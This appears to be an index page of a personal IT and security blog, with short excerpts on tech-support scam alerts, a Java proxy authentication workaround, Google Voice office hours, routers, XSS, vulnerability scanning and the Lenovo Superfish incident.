Microsoft Security Essentials alerts – don’t call “Microsoft”

Last Tuesday night my oldest son came into the room and told me he thought one of our computers was being hacked. So I kicked into incident response mode and walked into the other room to be greeted with a computer loudly telling me that Microsoft Security Essentials was unable to clean a virus and to immediately call Microsoft.

Instead I immediately shut down the computer. Here’s why.

Read more

407 error in Java with Forcepoint

I had a Java app pointing at a Forcepoint (formerly known as Websense) proxy server. The proxy server wasn’t working, and the app was giving me a 407 error.

We had Websense set to require NTLM authorization, but it turns out Java won’t do NTLM, so the Java traffic wasn’t even showing up in the monitor.

My workaround was to have users open a browser, then go to any web page immediately before opening the app. By letting the browser authenticate for it, the Java app worked thanks to Websense having the credentials cached.

If you want, you can launch the applet with a batch file that uses IEcapt to hit any web page, then starts the applet.

How I set up office hours in Google Voice

If you have a side business, you need to offer customer service, but it’s also perfectly reasonable to not want your phone to ring at 3 a.m. You can fix that if you set up office hours in Google Voice.

Fortunately it’s easy to set up Google Voice to allow your phone to ring during office hours and go straight to voice mail after hours. And the nice thing is, Google Voice transcribes your messages. This makes it very easy to filter out people who are calling you trying to solicit your services at 25 cents on the dollar. I can’t say for certain that people are more likely to do that at off hours. But it’s certainly more annoying to get awakened at 3 a.m. by someone wanting to lowball you. And yes, I speak from experience.

Here’s how you do it if you don’t want to be disturbed at unreasonable hours.

Read more

You might need a new router

Do you need a new router? If your Internet is slow after upgrading to a faster service, and if your wifi range and reception is poor, or your Internet connection just generally misbehaves a lot, you might need a new router.

Even the New York Times, of all places, has published articles extolling the virtues of new routers. If your wi-fi at home is bad, they say, think about picking up a TP-Link Archer C7 router. I like the Asus RT-AC66U myself,  but in my experience, and the experience of my colleagues, a new router makes a huge difference.

When one longtime friend upgraded to a TP-Link Archer, he told me his wi-fi improved so much his wired network was suddenly struggling to keep up with it.

Read more

Change a headline, go to prison

A former journalist whose track record includes being fired from the Tribune Co. and from Reuters is facing two decades in prison for giving the hacking group Anonymous credentials to log into a Tribune web site and change stuff.

Anonymous changed one headline, and it took about 40 minutes for someone at Tribune Co. to notice and change it back.

It reminds me of something that happened at the newspaper where I used to work.

Read more

IEcapt is a command-line web browser that outputs screenshots

Sometimes you need to capture a web page in PNG or JPG format. And if you need to do that, it probably helps to be able to do it in an automated fashion, like by a script.

That’s IEcapt‘s purpose in life. IEcapt renders web pages using the Internet Explorer engine, then outputs it as a graphics file. Uses include e-mailing a dashboard to someone or capturing steps when technical writing. Sure, you can use a tool like Snagit, but IEcapt is free and can be automated.

If you need IEcapt, you probably already know it.

What cross-site scripting is and how to recognize it

In many security job interviews, the interviewer will ask about cross-site scripting, also known as XSS. Most descriptions of it are overly complex, however. The best description of it that I’ve ever heard is just five words long: Code execution in the browser.

That succinctly sums up the problem: You don’t want someone to be able to inject their code into your site.

Read more

Why I don’t scan networks with my own credentials

I scan the network I’m paid and sworn to protect on a nearly daily basis. I experienced a problem with the account I use for that, and I tested by scanning a small quantity of machines (my own and my cubicle neighbor’s) with my own account to make sure the problem was the account, not the tool.

Fixing the account has become a problem–my boss’ problem now–but when I told him about it, I said I could scan the network with my personal admin account, but didn’t want to. One reason has to do with liability and HR. The other, believe it or not, is technical.

Read more

Lenovo’s preinstalled Superfish spyware: A post-mortem

So, if you haven’t heard by now, last year Lenovo experimented with preloading its cheapest laptops with spyware that subverts HTTPS, allowing a third party to inject ads on any web page, and providing a convenient place for an attacker to hide behind while messing with your secure transactions.

By the end of the day yesterday, Lenovo had apologized, sort of, and after several sites had provided removal instructions, Lenovo provided its own. After spending much of the day downplaying the security concerns, by the end of the day they were at least reluctantly acknowledging them.

This was really bad, and I’ll explain why in a second, and I’ll also try to explain why Lenovo did it.

Read more

Yes, we need to run vulnerability scans inside the firewall

I got an innocent question last week. We’d been scanning an AIX server with Nexpose, a vulnerability scanner made by Rapid7, and ran into some issues. The system owner then asked a question: The server is behind a firewall and has no direct connection to the Internet and no data itself, it’s just a front-end to two other servers. Is there any reason to scan a server like that?

In my sysadmin days, I asked a similar question. Nobody could give me an answer that was any better than “because reasons.” So I’ll answer the question and give the reasons.

Read more